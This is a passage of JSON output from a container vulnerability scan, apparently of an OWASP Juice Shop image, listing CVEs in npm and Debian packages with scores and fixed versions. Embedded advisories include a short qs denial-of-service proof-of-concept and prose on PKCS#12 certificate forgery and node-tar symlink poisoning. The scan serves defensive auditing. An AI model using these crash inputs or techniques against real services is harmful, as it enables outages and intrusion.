4.0.1.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-65945","epss":0.00193,"percentile":0.09062,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-65945","cwe":"CWE-347","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jws","version":"0.2.6"}},"found":{"vulnerabilityID":"GHSA-869p-cjfg-cm3x","versionConstraint":"<3.2.3 (semantic)"},"fix":{"suggestedVersion":"3.2.3"}}],"artifact":{"id":"pkg:npm/jws@0.2.6?package-id=e3ae0c46d846c3b2","name":"jws","version":"0.2.6","type":"npm","locations":[{"path":"/juice-shop/node_modules/jws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:brianloveswords:jws:0.2.6:*:*:*:*:*:*:*","cpe:2.3:a:jws:jws:0.2.6:*:*:*:*:*:*:*"],"purl":"pkg:npm/jws@0.2.6","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-34181","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-34181","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue Summary: The PKCS#12 file processing fails to perform sufficient input validation for files that use Password-Based Message Authentication Code 1 (PBMAC1) integrity mechanism allowing a certificate and private key forgery. Impact Summary: An attacker impersonating a user can cause a service reading PKCS#12 files to accept forged certificates and private keys with a 1 in 256 probability. If a service accepting PKCS#12 files is using passwords for authenticating the received files, the attacker can create unencrypted PKCS#12 files that use PBMAC1 authentication that specifies an HMAC key of only one byte, allowing them to craft a file that will be accepted with a 1 in 256 probability. That would then cause the service to accept a certificate and private key controlled by the attacker. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.4,"exploitabilityScore":2.3,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34181","epss":0.00194,"percentile":0.09203,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34181","cwe":"CWE-354","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.14453},"relatedVulnerabilities":[{"id":"CVE-2026-34181","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-34181","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/0300eb9ddce7a0895bf301a4b0c03a9da2313a0f","https://github.com/openssl/openssl/commit/79eb76a937e474bb7610a0a3dc57131dc8dc6610","https://github.com/openssl/openssl/commit/85dcbb3abaa4878af5c8fbbe11bce708fcf984a7","https://github.com/openssl/openssl/commit/ec36f2417c4ddd8cabce4b4a60a3d7a7365f2d81","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue Summary: The PKCS#12 file processing fails to perform sufficient input\nvalidation for files that use Password-Based Message Authentication Code 1\n(PBMAC1) integrity mechanism allowing a certificate and private key forgery.\n\nImpact Summary: An attacker impersonating a user can cause a service reading\nPKCS#12 files to accept forged certificates and private keys with a 1 in 256\nprobability.\n\nIf a service accepting PKCS#12 files is using passwords for authenticating\nthe received files, the attacker can create unencrypted PKCS#12 files that\nuse PBMAC1 authentication that specifies an HMAC key of only one byte, allowing\nthem to craft a file that will be accepted with a 1 in 256 probability.\nThat would then cause the service to accept a certificate and private key\ncontrolled by the attacker.\n\nThe FIPS modules are not affected by this issue, as the affected code is\noutside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.4,"exploitabilityScore":2.3,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34181","epss":0.00194,"percentile":0.09203,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34181","cwe":"CWE-354","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-34181","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-q8mj-m7cp-5q26","dataSource":"https://github.com/advisories/GHSA-q8mj-m7cp-5q26","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/ljharb/qs/security/advisories/GHSA-q8mj-m7cp-5q26","https://nvd.nist.gov/vuln/detail/CVE-2026-8723","https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41"],"description":"qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","metrics":{"baseScore":6.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-8723","epss":0.00267,"percentile":0.18051,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-8723","cwe":"CWE-476","source":"7ffcee3d-2c14-4c3e-b844-86c6a321a158","type":"Secondary"}],"fix":{"versions":["6.15.2"],"state":"fixed","available":[{"version":"6.15.2","date":"2026-05-23","kind":"first-observed"}]},"advisories":[],"risk":0.14418},"relatedVulnerabilities":[{"id":"CVE-2026-8723","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-8723","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41","https://github.com/ljharb/qs/security/advisories/GHSA-q8mj-m7cp-5q26"],"description":"### Summary\n\n\n\n`qs.stringify` throws `TypeError` when called with `arrayFormat: 'comma'` and `encodeValuesOnly: true` on an array containing `null` or `undefined`. The throw is synchronous and not handled by any of qs's null-related options (`skipNulls`, `strictNullHandling`).\n\n\n\n### Details\n\n\n\nIn the comma + `encodeValuesOnly` branch, `lib/stringify.js:145` mapped the array through the raw encoder before joining:\n\n\n\n```js\n\n\n\nobj = utils.maybeMap(obj, encoder);\n\n\n\n```\n\n\n\n`utils.encode` (`lib/utils.js:195`) reads `str.length` with no null guard, so a `null` or `undefined` element throws `TypeError`. `skipNulls` and `strictNullHandling` are both checked in the per-element loop below this line and never get a chance to run.\n\n\n\nSame class of bug as the filter-array path fixed in 0c180a4. The vulnerable shape of the comma + `encodeValuesOnly` branch was introduced in 4c4b23d (\"encode comma values more consistently\", PR #463, 2023-01-19), first released in v6.11.1.\n\n\n\n#### PoC\n\n\n\n```js\n\n\n\nconst qs = require('qs');\n\n\n\nqs.stringify({ a: [null, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [undefined, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [null] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\n// TypeError: Cannot read properties of null (reading 'length')\n\n\n\n// at encode (lib/utils.js:195:13)\n\n\n\n// at Object.maybeMap (lib/utils.js:322:37)\n\n\n\n// at stringify (lib/stringify.js:145:25)\n\n\n\n```\n\n\n\n#### Fix\n\n\n\n`lib/stringify.js:145`, applied in 21f80b3 on `main` and released as v6.15.2:\n\n\n\n```diff\n\n\n\n- obj = utils.maybeMap(obj, encoder);\n\n\n\n+ obj = utils.maybeMap(obj, function (v) {\n\n\n\n+ return v == null ? v : encoder(v);\n\n\n\n+ });\n\n\n\n```\n\n\n\n`null` and `undefined` now pass through `maybeMap` unchanged and reach the `join(',')` step as-is. For `{ a: [null, 'b'] }` this produces `a=,b`, matching the non-`encodeValuesOnly` comma path (which already joins before encoding and produces `a=%2Cb` for the same input). Single-element `[null]` arrays still collapse via the existing `obj.join(',') || null` and remain subject to `skipNulls` / `strictNullHandling` in the main loop.\n\n\n\n### Affected versions\n\n\n\n`>=6.11.1 <6.15.2` — fixed in v6.15.2.\n\n\n\nThe vulnerable code shape was introduced in 4c4b23d and first shipped in v6.11.1. Earlier versions — including all of 6.7.x, 6.8.x, 6.9.x, 6.10.x, and 6.11.0 — implemented the comma + `encodeValuesOnly` path differently (joining before encoding) and are not affected. Empirically verified across released versions.\n\n\n\n### Impact\n\n\n\nApplication code that calls `qs.stringify` with both `arrayFormat: 'comma'` and `encodeValuesOnly: true` (both non-default) on input that may contain a `null` or `undefined` array element will throw synchronously instead of producing a query string. In a typical Node.js HTTP framework (Express, Fastify, Koa, hapi) the sync throw is caught by the framework's error boundary and the affected request returns a 500; the worker process does not exit and subsequent requests are unaffected. The \"kills the worker process\" framing applies only to call sites outside a request-handler error boundary (background jobs, startup paths, stream pipelines) or to deployments with framework error handling explicitly disabled.\n\n\n\nThe vulnerable input is a `null` or `undefined` entry inside an array; this is reachable from JSON request bodies or from application code constructing arrays from user input, but not from standard HTML form submissions (which produce strings or omitted fields, not literal `null`).","cvss":[{"source":"7ffcee3d-2c14-4c3e-b844-86c6a321a158","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":6.3},"vendorMetadata":{}},{"source":"7ffcee3d-2c14-4c3e-b844-86c6a321a158","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-8723","epss":0.00267,"percentile":0.18051,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-8723","cwe":"CWE-476","source":"7ffcee3d-2c14-4c3e-b844-86c6a321a158","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"qs","version":"6.15.1"}},"found":{"vulnerabilityID":"GHSA-q8mj-m7cp-5q26","versionConstraint":">=6.11.1,<=6.15.1 (semantic)"},"fix":{"suggestedVersion":"6.15.2"}}],"artifact":{"id":"pkg:npm/qs@6.15.1?package-id=0d0b4cfd63c59995","name":"qs","version":"6.15.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/qs/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["BSD-3-Clause"],"cpes":["cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/qs@6.15.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-qhxp-v273-g94h","dataSource":"https://github.com/advisories/GHSA-qhxp-v273-g94h","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2019-25225","https://github.com/apostrophecms/sanitize-html/issues/293","https://github.com/apostrophecms/sanitize-html/pull/156","https://github.com/apostrophecms/sanitize-html/commit/712cb6895825c8bb6ede71a16b42bade42abcaf3","https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2019/CVE-2019-25225"],"description":"sanitize-html is vulnerable to XSS through incomprehensive sanitization","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":2.9,"impactScore":2.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-25225","epss":0.00251,"percentile":0.1613,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-25225","cwe":"CWE-79","source":"596c5446-0ce5-4ba2-aa66-48b3b757a647","type":"Secondary"}],"fix":{"versions":["2.0.0-beta"],"state":"fixed","available":[{"version":"2.0.0-beta","date":"2025-09-13","kind":"first-observed"}]},"advisories":[],"risk":0.13930499999999998},"relatedVulnerabilities":[{"id":"CVE-2019-25225","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-25225","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2019/CVE-2019-25225","https://github.com/apostrophecms/sanitize-html/commit/712cb6895825c8bb6ede71a16b42bade42abcaf3","https://github.com/apostrophecms/sanitize-html/issues/293","https://github.com/apostrophecms/sanitize-html/pull/156"],"description":"`sanitize-html` prior to version 2.0.0-beta is vulnerable to Cross-site Scripting (XSS). The `sanitizeHtml()` function in `index.js` does not sanitize content when using the custom `transformTags` option, which is intended to convert attribute values into text. As a result, malicious input can be transformed into executable code.","cvss":[{"source":"596c5446-0ce5-4ba2-aa66-48b3b757a647","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":2.9,"impactScore":2.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-25225","epss":0.00251,"percentile":0.1613,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-25225","cwe":"CWE-79","source":"596c5446-0ce5-4ba2-aa66-48b3b757a647","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-qhxp-v273-g94h","versionConstraint":"<2.0.0-beta (semantic)"},"fix":{"suggestedVersion":"2.0.0-beta"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"CVE-2010-4756","dataSource":"https://security-tracker.debian.org/tracker/CVE-2010-4756","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.","cvss":[],"epss":[{"cve":"CVE-2010-4756","epss":0.02633,"percentile":0.83526,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2010-4756","cwe":"CWE-399","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.13165},"relatedVulnerabilities":[{"id":"CVE-2010-4756","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2010-4756","namespace":"nvd:cpe","severity":"Medium","urls":["http://cxib.net/stuff/glob-0day.c","http://securityreason.com/achievement_securityalert/89","http://securityreason.com/exploitalert/9223","https://bugzilla.redhat.com/show_bug.cgi?id=681681","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756","https://security.netapp.com/advisory/ntap-20241108-0002/"],"description":"The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:S/C:N/I:N/A:P","metrics":{"baseScore":4,"exploitabilityScore":8,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2010-4756","epss":0.02633,"percentile":0.83526,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2010-4756","cwe":"CWE-399","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2010-4756","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-42769","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42769","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"Issue Summary: An error in the callback used to verify the certificate provided in a Root CA key update Certificate Management Protocol (CMP) message response rendered the certificate validation ineffectual, which could lead to escalation of credentials from the Registration Authority (RA) level to the root Certification Authority (root CA) level. Impact Summary: The Registration Autority could replace the root CA certificate for the CMP clients with an arbitrary root CA certificate. One of the parts of the Certificate Management Protocol (CMP), specified in RFC 9810, is Root Certification Authority (root CA) key Rollover, which is sent by the server in a message with type 'id-it-rootCaKeyUpdate'. As part of these messages, 'newWithOld' certificate, the new root CA certificate signed with the old root CA key, is provided, and verifying its signature is crucial for transferring the trust from the old CA key to the new one. The 'id-it-rootCaKeyUpdate' messages are expected to be processed with OSSL_CMP_get1_rootCaKeyUpdate(), that is expected to verify the 'newWithOld' certificate. A typo in the certificate chain building code led to adding an incorrect certificate ('newWithOld' instead of 'oldRoot') to the certificate chain, rendering the certificate verification process ineffectual (only the issuer name and the algorithm OIDs were verified by other parts of the verification code). An attacker who already has credentials that satisfy the CMP message protection checks can generate a new key pair and use a crafted self-signed certificate in its 'id-it-rootCaKeyUpdate' CMP messages which affected CMP clients would accept as a new trust anchor. Significant preconditions for the attack (having valid RA-level credentials) are the reason the issue was assigned Low severity. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":1.7,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42769","epss":0.00255,"percentile":0.16624,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42769","cwe":"CWE-295","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.13132500000000003},"relatedVulnerabilities":[{"id":"CVE-2026-42769","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42769","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/openssl/openssl/commit/54d0989997e5fc26057009a9782c3441ce3842fb","https://github.com/openssl/openssl/commit/777b363b16fcf2153bb3ded39dc3838713667c44","https://github.com/openssl/openssl/commit/d35cd473a271bf3ce7bf3d32af53217fb83ae92c","https://github.com/openssl/openssl/commit/d531f21c0fe99067a66fc0ff1161ef127f9cd70b","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue Summary: An error in the callback used to verify the certificate\nprovided in a Root CA key update Certificate Management Protocol (CMP)\nmessage response rendered the certificate validation ineffectual, which\ncould lead to escalation of credentials from the Registration Authority (RA)\nlevel to the root Certification Authority (root CA) level.\n\nImpact Summary: The Registration Autority could replace the root CA\ncertificate for the CMP clients with an arbitrary root CA certificate.\n\nOne of the parts of the Certificate Management Protocol (CMP), specified in\nRFC 9810, is Root Certification Authority (root CA) key Rollover,\nwhich is sent by the server in a message with type 'id-it-rootCaKeyUpdate'.\nAs part of these messages, 'newWithOld' certificate, the new root CA\ncertificate signed with the old root CA key, is provided, and verifying its\nsignature is crucial for transferring the trust from the old CA key to the\nnew one.\n\nThe 'id-it-rootCaKeyUpdate' messages are expected to be processed with\nOSSL_CMP_get1_rootCaKeyUpdate(), that is expected to verify the 'newWithOld'\ncertificate. A typo in the certificate chain building code led to adding\nan incorrect certificate ('newWithOld' instead of 'oldRoot') to the\ncertificate chain, rendering the certificate verification process ineffectual\n(only the issuer name and the algorithm OIDs were verified by other parts\nof the verification code).\n\nAn attacker who already has credentials that satisfy the CMP message\nprotection checks can generate a new key pair and use a crafted self-signed\ncertificate in its 'id-it-rootCaKeyUpdate' CMP messages which affected CMP\nclients would accept as a new trust anchor.\n\nSignificant preconditions for the attack (having valid RA-level credentials)\nare the reason the issue was assigned Low severity.\n\nThe FIPS modules are not affected by this issue, as the affected code is\noutside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":1.7,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42769","epss":0.00255,"percentile":0.16624,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42769","cwe":"CWE-295","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42769","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-r6q2-hw4h-h46w","dataSource":"https://github.com/advisories/GHSA-r6q2-hw4h-h46w","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w","https://nvd.nist.gov/vuln/detail/CVE-2026-23950","https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6"],"description":"Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23950","epss":0.00153,"percentile":0.0475,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23950","cwe":"CWE-176","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-352","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["7.5.4"],"state":"fixed","available":[{"version":"7.5.4","date":"2026-01-22","kind":"first-observed"}]},"advisories":[],"risk":0.12469499999999999},"relatedVulnerabilities":[{"id":"CVE-2026-23950","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-23950","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6","https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w"],"description":"node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision 